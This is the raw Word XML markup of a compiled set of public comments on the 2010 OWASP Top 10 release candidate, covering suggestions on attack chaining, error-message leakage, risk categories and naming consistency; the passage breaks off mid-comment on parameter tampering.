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2AF" w:rsidRDefault="002022AF"/>
    <w:p w:rsidR="00C03D5B" w:rsidRDefault="009967C9">
      <w:r>
        <w:t xml:space="preserve">The following are all the public comments </w:t>
      </w:r>
      <w:r w:rsidR="007A7C26">
        <w:t>OWASP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> received regarding the 2010 OWASP Top 10 Release Candidate that was released Nov 13</w:t>
      </w:r>
      <w:r w:rsidRPr="009967C9">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r>
        <w:t>, 2009 at the OWASP U.S. Conference in Washington D.C. It includes all</w:t>
      </w:r>
      <w:r w:rsidR="007A7C26">
        <w:t xml:space="preserve"> comments received thru March 30</w:t>
      </w:r>
      <w:r>
        <w:t>, 2010.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009967C9" w:rsidRDefault="00C914CE" w:rsidP="00C914CE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>From K</w:t>
      </w:r>
      <w:r w:rsidRPr="00C914CE">
        <w:t xml:space="preserve">ai </w:t>
      </w:r>
      <w:r>
        <w:t>J</w:t>
      </w:r>
      <w:r w:rsidR="00DD1108" w:rsidRPr="00C914CE">
        <w:t>endrian</w:t>
      </w:r>
      <w:r w:rsidR="00DD1108">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:t>He p</w:t>
      </w:r>
      <w:r w:rsidR="00DD1108">
        <w:t>rovided detailed comments within a PDF, attached separately.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B4685B" w:rsidRDefault="00B4685B" w:rsidP="00B4685B"/>
    <w:p w:rsidR="00B4685B" w:rsidRDefault="009C2FFD" w:rsidP="00C914CE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:r w:rsidR="00B4685B">
        <w:t xml:space="preserve">Raul </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B4685B">
        <w:t>Siles</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B4685B" w:rsidRDefault="00B4685B" w:rsidP="007C015D">
      <w:r>
        <w:t>Hi,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B4685B" w:rsidRDefault="00B4685B" w:rsidP="007C015D">
      <w:r>
        <w:t>As the topic of adding missing vulnerabilities, or grouping them together, is appearing (has appeared in the past and will appear) on multiple OWASP Top 10 mailing-list threads, what about including a brief final section or appendix in the document with a list of the non-included issues? This will help the interested reader into researching about those other things that didn't get into the Top 10 but are the next set of important things to consider.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B4685B" w:rsidRDefault="00B4685B" w:rsidP="007C015D">
      <w:r>
        <w:t xml:space="preserve">Of course, that suggested list could be endless, so I recommend </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>to take the next 10 issues (rough number) and list</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> them there. The idea is not to create a Top 20, 25, etc, and not to describe them in detail, but to provide a quick pointer for the Top 10 readers that, after reading the document, ask themselves... "</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>what</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> else should I consider next?".</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B4685B" w:rsidRDefault="00B4685B" w:rsidP="007C015D">
      <w:r>
        <w:t>Cheers,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B4685B" w:rsidRDefault="00B4685B" w:rsidP="007C015D">
      <w:r>
        <w:t>--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B4685B" w:rsidRDefault="00B4685B" w:rsidP="007C015D">
      <w:r>
        <w:t xml:space="preserve">Raul </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Siles</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00B4685B" w:rsidRDefault="00B4685B" w:rsidP="00B4685B">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B4685B" w:rsidRDefault="009C2FFD" w:rsidP="00C914CE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:r w:rsidR="00B4685B">
        <w:t xml:space="preserve">Andre </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B4685B">
        <w:t>Gironda</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B4685B" w:rsidRDefault="00B4685B" w:rsidP="007C015D">
      <w:r>
        <w:t>The #1 in the OWASP Top Ten should be "Attack Chaining", because it's</w:t>
      </w:r>
      <w:r w:rsidR="007C015D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>rare to find people who get this concept. Thus, concepts like using</w:t>
      </w:r>
      <w:r w:rsidR="007C015D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>XSS to bypass CSRF protections can be discussed. Also, using log/error</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B4685B" w:rsidRDefault="00B4685B" w:rsidP="007C015D">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>files</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> or other writable local files can turn a LFI into an RFI. Source</w:t>
      </w:r>
      <w:r w:rsidR="007C015D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>code disclosure can lead to very advanced (e.g. logic) attacks with</w:t>
      </w:r>
      <w:r w:rsidR="007C015D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>full-knowledge.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B4685B" w:rsidRDefault="00B4685B" w:rsidP="007C015D">
      <w:r>
        <w:t>OWASP T10 is mostly a marketing tool. What SANS/CWE Top 25 and many</w:t>
      </w:r>
      <w:r w:rsidR="007C015D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>other marketing tools don't show is that the problems aren't meant to</w:t>
      </w:r>
      <w:r w:rsidR="007C015D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">be solved one-at-a-time. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>One vulnerability</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> isn't as "prevalent" or</w:t>
      </w:r>
      <w:r w:rsidR="007C015D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>"severe" as any other, especially because multiple vulnerabilities are</w:t>
      </w:r>
      <w:r w:rsidR="007C015D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>almost always present in any given large web application.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B4685B" w:rsidRDefault="00B4685B" w:rsidP="007C015D">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>We're not recommending controls with the T10; we're trying to</w:t>
      </w:r>
      <w:r w:rsidR="007C015D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>demonstrate the attack principles -- the inherent weaknesses in the</w:t>
      </w:r>
      <w:r w:rsidR="007C015D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>system. Yet we forget that the system can be attacked like a system.</w:t>
      </w:r>
      <w:r w:rsidR="007C015D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>The Orange book calls them "object reuse" and "covert channels".</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B4685B" w:rsidRPr="009C2FFD" w:rsidRDefault="00B4685B" w:rsidP="00B4685B">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>dre</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="007C015D" w:rsidRDefault="009C2FFD" w:rsidP="00C914CE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:r w:rsidR="007C015D">
        <w:t>Ryan Barnett</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C015D" w:rsidRDefault="007C015D" w:rsidP="007C015D">
      <w:r>
        <w:t>I have a comment on this section of pg. 5 of the PDF -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C015D" w:rsidRDefault="007C015D" w:rsidP="007C015D">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>REMOVED: A6 –Information Leakage and Improper Error Handling.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> This issue is extremely prevalent, but the impact of disclosing stack trace and error message information is typically minimal.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C015D" w:rsidRDefault="007C015D" w:rsidP="007C015D">
      <w:r>
        <w:t xml:space="preserve">Based on my experience in working with our customers, default error messages (which give detailed stack dump or that dynamically insert DB error messages into the response page) are </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>an</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> serious issue.  It is true that these error pages are not a direct vulnerability in and of themselves, however they help to facilitate and expedite the attacker's iterative process of SQL Injection payloads so that they can get the DB correct syntax.  Even worse, these detailed error messages are often used as the actual transport mechanism to extract out customer records from back-end DBs.  I have </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>see</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> this happen too many times...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C015D" w:rsidRDefault="007C015D" w:rsidP="007C015D">
      <w:r>
        <w:t xml:space="preserve">Now, all of this being said - it is my belief that with the inclusion of the new A6 - Security </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Misconfiguration</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> - category that this would actually cover the sub-category of making sure that any detailed error messages pages that may have been enabled during staging/testing/QA have been properly reconfigured for production (which is the #1 root cause that we find).  This seems somewhat similar to the approach that was taken from 2004 -&gt; 2007 version with collapsing all of the various injection flaws into 1 category which allowed for some new ones.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C015D" w:rsidRDefault="007C015D" w:rsidP="007C015D">
      <w:r>
        <w:t xml:space="preserve">Do you agree with this assessment that the new A6 section would actually cover </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>InfoLeakage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/Error Handling issues?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C015D" w:rsidRDefault="007C015D" w:rsidP="007C015D">
      <w:r>
        <w:t>Ryan C. Barnett</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C2FFD" w:rsidRDefault="009C2FFD" w:rsidP="00C914CE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ketan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Vyas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C2FFD" w:rsidRDefault="009C2FFD" w:rsidP="009C2FFD">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Greetings Dave,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Thank you Dave &amp; team for wonderful compilation.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Changing Top 10 perspective from vulnerability to risk gives more visibility to business decision makers. Most of the business applications have Middleware and backend support systems such as ERP/CRM/BI products. We haven't </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>consider</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> exact risk while putting interaction amongst these components. Authentication (A3), Default Authorization (A6) and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Secure</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> communication (A10) are already covered however from risk perspective, I could see 2 more opportunities.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1.        Access control at interface layer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>2.        Insufficient logging and accountability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:br/>
        <w:t>Here are some improvement suggestions:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">* </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>This</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> is for risk, how can we miss the weakest link - People. We can add something for providing end user awareness. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">* We have What Next for developer and verifiers however I couldn't see </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>What</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> next for decision makers. Suggest </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to add</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> a section.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>Regards</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Ketan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Vyas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Regards,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Ketan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Dilipkumar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Vyas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00DD1108" w:rsidRDefault="00C914CE" w:rsidP="00C914CE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:r w:rsidR="00AD7069">
        <w:t xml:space="preserve">Alex </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AD7069">
        <w:t>Lauerman</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AD7069">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C914CE" w:rsidRDefault="00C914CE" w:rsidP="00C914CE">
      <w:r>
        <w:t>Dave</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>This may have come up before, but one thing that has always bugged me about the OWASP Top 10 is that the items are inconsistently named.  For example, some items are attacks (Cross-Site Scripting), and some are weaknesses (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Unvalidated</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Redirects and Forwards).  It seems to me like it would be more consistent to name Cross-Site Scripting something like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Unvalidated</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Input and Lack of Output Encoding.  I realize you are trying to make it simple, but I'm not sure if it's clearer for the reader/user to mix attacks and weaknesses (versus consistent but less obvious names).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C914CE" w:rsidRDefault="00C914CE" w:rsidP="00C914CE">
      <w:r>
        <w:t xml:space="preserve">One other thing off the top of my head is that I believe "Cross Site Scripting" and "Cross Site Request Forgery" should be written with a hyphen (e.g., Cross-Site Scripting and Cross-Site Request Forgery).  I'm far from a grammar expert, but I can get </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ahold</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> of one if that would be helpful.  There are </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> obviously a lot of articles on hyphenation, but </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>here</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> is one I just brought up.  I think their e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">xample's of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">"First-class decisions require clear-headed thinking" are pretty similar in structure to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"Cross Site Scripting" and "Cross Site Request Forgery".</w:t>
      </w:r>
      <w:r>
        <w:t>  I'm not trying to nitpick, but that's how I write them and I wanted to provide feedback.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C914CE" w:rsidRDefault="00C914CE" w:rsidP="00C914CE">
      <w:r>
        <w:t>Thanks for listening</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:br/>
        <w:t>Alex</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C914CE" w:rsidRPr="00C914CE" w:rsidRDefault="00C914CE" w:rsidP="00C914CE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C914CE" w:rsidRPr="00C914CE" w:rsidRDefault="00C914CE" w:rsidP="00C914CE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AD7069" w:rsidRDefault="00C914CE" w:rsidP="00C914CE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>From: Honest Abe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C914CE" w:rsidRDefault="00C914CE" w:rsidP="00C914CE">
      <w:r>
        <w:t>I am a security code reviewer in large financial institution.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C914CE" w:rsidRDefault="00C914CE" w:rsidP="00C914CE">
      <w:r>
        <w:t xml:space="preserve">There is one thing I see as a trend which is not reflected in the OWASP Top 10.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C914CE" w:rsidRDefault="00C914CE" w:rsidP="00C914CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Parameter Tampering.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">  When I say parameter tampering </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>I</w:t>
